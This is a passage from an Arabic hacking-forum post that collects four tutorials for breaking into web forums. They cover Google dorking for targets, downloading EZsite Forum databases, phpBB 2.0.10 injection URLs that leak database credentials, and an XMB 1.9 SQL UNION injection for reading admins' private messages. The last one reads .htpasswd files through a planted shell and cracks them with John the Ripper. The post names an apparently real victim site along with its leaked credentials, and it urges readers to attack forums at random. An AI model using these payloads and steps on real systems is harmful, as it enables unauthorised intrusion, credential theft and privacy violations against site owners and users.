انا اليوم اقدم اكبر مكتبة ثغرات في منتدي العاصفة
اول شئ
بسم الله الرحمن الرحيم
كيف الحال انشالله بخير الجميع ؟؟؟؟؟؟؟؟؟؟
انا اليوم جايب لكم ثغرة سهله جداً جداً الثغرة اسمها EZsite forum
يعني ما تأخذ من وقتك شي جربوها انتم .
بسم الله نبدا الشرح
المهم الحين بشرحها وابيكم تطبقوا بس على فكره لما تدخل لوحه التحكم يعني يبي لك تدور ولما تبي تغير الباسورد يكون اخر خيار على يدك اليسار اوووووكيك تفضل الشرح :
ادخل على محرك البحث قوقل Google
بعدين ابحث عن هذه الثغرة
EZsite Forum
يعني نزلها بمحرك قوقل
بتطلع مواقع كثيره
نعطيك مثال
http://www.×××××××.com/forum/ طلع لنا هذا الموقع
نضع بعد كلمةforum هذه الوصلهDatabase/EZsiteForum.mdb
يعني يصير الموقع كذى
http://www.×××××.com/forum/Database/EZsiteForum.mdb نضغط انتر
بيطلع لنا تحميل قاعدة البيانات
ندور على اليوزر نيم والباسوورد
بعد مانحصلها
نروح للموقع
ونكتب بعد
http://×××××.com/forum ForumManager.asp
يعني يصير الموقع كذى
http://×××××.com/forum/ForumManager.asp تطلع لنا لوحة التحكم نكتب فيها الباسوورد واليوزر نيم الى اخذناه من لوحة التحكم
وعلى كذى نخترق الموقع
هاه وش رايكم بالشرح
ما قلت لكم سهلة ما بقى عليكم الى التجربة
الثغرة الثانية:
بسم الله الرحمن الرحيم
هلا يا شباب
طبعا اخونا hazimal نزل الثغرة وشرح لها بس استخدامها أو اثتمارها ضعيف جداً وهو إحتمال كون باسورد قاعدة البيانات هى باسورد الإف تى بى علشان ترفع الشل وتخترق
السؤال ليه نستخدم الإف تى بى لرفع الشيل ونسبة إن الباسورد للقاعدة تكون نفس باسورد الإف تى هى 40%
أما قاعدة البيانات فالنسبة هى 100% لإن هذه البيانات الى تظهر لنا هى بيانات قاعدة البيانات
وإن لم يتم الإتصال فهذا يعود للبرنامج المستخدم فى الإتصال بالقاعدة وراح اقدم بكم برنامج يتصل بأغلب نظم القواعد
ولو كانت فعلا الإف تى بى يبقى ريحتنا من الشغل
لكن لو مش هيا يبقى نسيب المنتدى المصاب بالثغرة الخطيرة دى ؟؟
وفى تعليق بسيط على شرح أخوى hazimal هو إن الكود المستخدم لمعرفة إسم المستخدم هو dbuser وليس dbname لإن هذا الأخير لمعرفة إسم قاعدة البيانات وليس اسم مستخدم قاعدة البيانات
وعلى العموم انا اليوم بقدم لكم إستثمار تانى للثغرة
ولثغرة هى من نوع إختراق قواعد البيانات
ولمن لايعلم لإختراق قاعدة البيانات لابد إننا نعرف 3 حاجات
1- اسم المستخدم User
2- كلمة المرور Password
3- موقع القاعدة dbHost
اسيبكم مع الشرح
البحث عن الهدف
نفتح أى محرك بحث وأنصح بالجوجل
www.Google.com ومفتاح البحث هو
Powered by phpBB 2.0.10
نختار أحد النتائج وفأر التجارب لهذا الشرح هو
http://familyenergy.com المهم احنا دلوقتى عايزين نعرف اسم مستخدم قاعدة البيانات نضيف بعد رابط المنتدى الرابط التالى
viewtopic.php?p=44&highlight=%2527.$poster=$dbuser .%2527
ونضغط المفتاح إنتر
راح نلاقى ظهر لنا موضوع دلوقتى نركز فى اسم كاتب الموضوع هنلاقيه
family)\b#i
ناخد الى قبل القوس يبقى اسم المستخدم هو family
دلوقتى عايزن نعرف الباسورد نضيف الرابط التالى بعد مجلد المنتدى
viewtopic.php?p=44&highlight=%2527.$poster=$dbpass wd.%2527
خنلاقى الباسورد طلعت
unit101)\b#i
برضه ناخد الى قبل القوس تبقى الباسورد unit101
دلوقتى عايزين نعرف موقع قاعدة البيانات نضيف الرابط التالى
viewtopic.php?p=44&highlight=%2527.$poster=$dbhost .%2527
زى ما احنا شايفين طلع لنا
localhost)\b#i
ناخد برضه الى قبل القوس localhost
وده معناه إن القاعدة على نفس الموقع يبقى موقع القاعدة فى الحالة دى familyenergy.com
دلوقتى احنا معانا اليورز والباس والهوست يعنى نقدر نخترق قاعدة البيانات
أول حاجة لازم يكون معانا برنامج للإتصال بالقاعدة وفى برنامج انا بستخدمه اسمه Navicat
بعد التحميل والتنصيب افتحه هتلاقى صورة زى دى
1- تدوس عليها علشان تظهر لك نافذة الإتصال
2- إسم الإتصال اكتب أى اسم تحب
3- الهوست وزى ما جبناه هو familyenergy.com
4- البورت وده ثابت متغيروش
5- اسم المستخدم وزى ما جبناه family
6- الباسورد وزى ما جبناها unit101
7- دوس عليه علشان تتأكد من صحة الإتصال
إذا ظهر مبع يقولك Conection Successful يبقى مبروك عليك قاعدة بيانات الموقع
دوس Ok وارج هتلاقى ظهر لك على اليمين اسم الإتصال دوس عليه دبل كليك هتلاقى الإتصال بالقاعدة تم
دلوقتى ظهر لنا جداول كثير عايزين نعرف انهى واحد فيهم بتاع المنتدى
يبقى نرجع تانى للمنتدى ونحط بعد رابط مجلد المنتدى
viewtopic.php?p=44&highlight=%2527.$poster=$dbname .%2527
هنلاقى ظهر لنا
feboards)\b#i
يعنى اسم القاعدة feboards
ندور عليها فى القواعد الى عندنا وندوس عليها دبل كليك
هتلاقى ادامك كل جداول المنتدى ومبروك عليك
فى الجدول phpbb_users راح تلاقى كل أسماء المستخدمين والباسوردات المشفرة
فك التشفير أو استخدم برنامج سارق الكوكيز و كن الأدمن و ارفع الشل عن طريق الإبتسامات
لقفل الثغرة عليك بالترقية للنسخة الجديدة 2.0.11
وهذا رابط النسخة الجديدة
الثغرة الثالثة:
بسم الله الرحمن الرحيم
انا ماشفت احد شرح ثغرة Powered by XMB 1.9 Nexus
قلت بشرحها انا وان شاء الله تكون سهله
وهي فعلا سهله الثغره
ولكن ما راح تخترق المنتدى فقط تقدر تشوف رسائل الادمن الخاصه
اول شي روح الى قوقل او اي محرك بحث واكتب Powered by XMB 1.9 Nexus
www.google.com راح تحصل منتديات كثير
ادخل اي واحد منهم وسجل فيه وضيف بعد عنوان المنتدى
member.php?action=viewpro&member=xp10&restrict=%20 f.private=-99%20GROUP%20BY %20p.fid%20UNION%20SELECT%20password,null,9
غير كلمة xp10 الى اسم العضو او الادمن الي تبي تشوف رسائله الخاصه
والان بعد ماكتبت اسم الادمن او العضو الي تبي تشوفه رسائله روح الصق الرابط بعد عنوان المنتدى
الحين راح يطلع لنا الملف الشخصي
اضغط على كلمة (Saada U2U) وراح تفتح لك خيارات مثل مجموعة الرسائل
واختار الي يعجبك
اما اذا طلع لك هذا الكلام يعني لازم تسجل بالمنتدى
U2Ude lugemiseks ja saatmiseks pead sa olema sisse logitud.
الثغرة الرابعة:
السلام عليكم ورحمة الله وبركاته
اخواني راح اشرح لكم طريقة تخطي الاكسزز بالمنتديات
المسئلة تراها بسيطة وماهي اختراع ذرة
اول حاجة لابد يكون لديك شل على الموقع او على المنتدى
اوكي لو فرضنا الان عندك شل على موقع
www.abc.com وانت فاتح الشل وموقعك بالمسار هو
/home/abc/public_html/
اوكي تروح وتدخل على مسار المنتدى ( مجلد المنتدى) وراح يكون مسارك بالشكل هذا
/home/abc/public_html/vb/
وبعدها تنتقل الى مجلد الادمن الموجود في مجلد الـ vb وراح يكون مسارك بالشكل هذا
/home/abc/public_html/vb/admincp/
1. طبق الأمر التالي لعرض محتوى ملف .htaccess
والامر راح يكون بالشكل هذا
cat /home/abc/public_html/vb/admincp/.htaccess
الناتج سيكون مشابهاً لـ:
AuthType Basic
AuthName "Restricted Area"
AuthUserFile "/home/abc/.htpasswds/vb/admincp/passwd"
require valid-user
الي نبغاه من الملف هو محتوى سطر AuthUserFile
في هذا السطر.. نأخذ مابعد كلمة AuthUserFile والذي بين النقطتين الي بالشكل هذا
" "
في مثالنا راح يكون بالشكل هذا:
/home/abc/.htpasswds/vb/admincp/passwd
2. قم بتطبيق الأمر التالي:
cat /home/abc/.htpasswds/vb/admincp/passwd
الناتج راح يكون مشابهاً لـ:
adminTzTUzGTZXhYU
3. افتح المفكرة.. واكتب ماحصلنا عليه في الخطوة رقم (2) واحفظه في ملف في C:passwd.txt
4. تأكد من وجود برنامج john the ripper في جهازك.. (http://www.mirrors.wiretapped.net/se...r/john-16w.zip)
لنفرض أنك فكيت ضغط البرنامج في C:
سيكون هناك مجلد اسمه john-16 وداخله مجلد run
نفتح الدوس (Start->run: cmd)
وننفذ:
cd john-16run
ونضغط انتر.. ثم ننفذ الأمر التالي:
john C:passwd.txt
راح تطلع لنا رسالة كـ:
Loaded 1 password (Standard DES [24/32 4K])
ننتظر إلى أن ينتهي من فك كلمة المرور.. اذا تم فكها سوف يعطينا رسالة مشابهة لـ:
mahar (admin)
guesses: 1 time: 0:00:00:00 100% c/s: 512 trying: goober - braves
نعرف أنه قد خمن كلمة المرور وفكها.. كلمة المرور في المثال هي mahar
اذن:
اسم المستخدم: admin
وكلمة المرور: mahar
المثال هذا مطبقه على احد المنتديات وفكيته في وقت قياسي
يالله انفلتوا على المنتديات ولا تخلون احد في حالــــــــــــــــه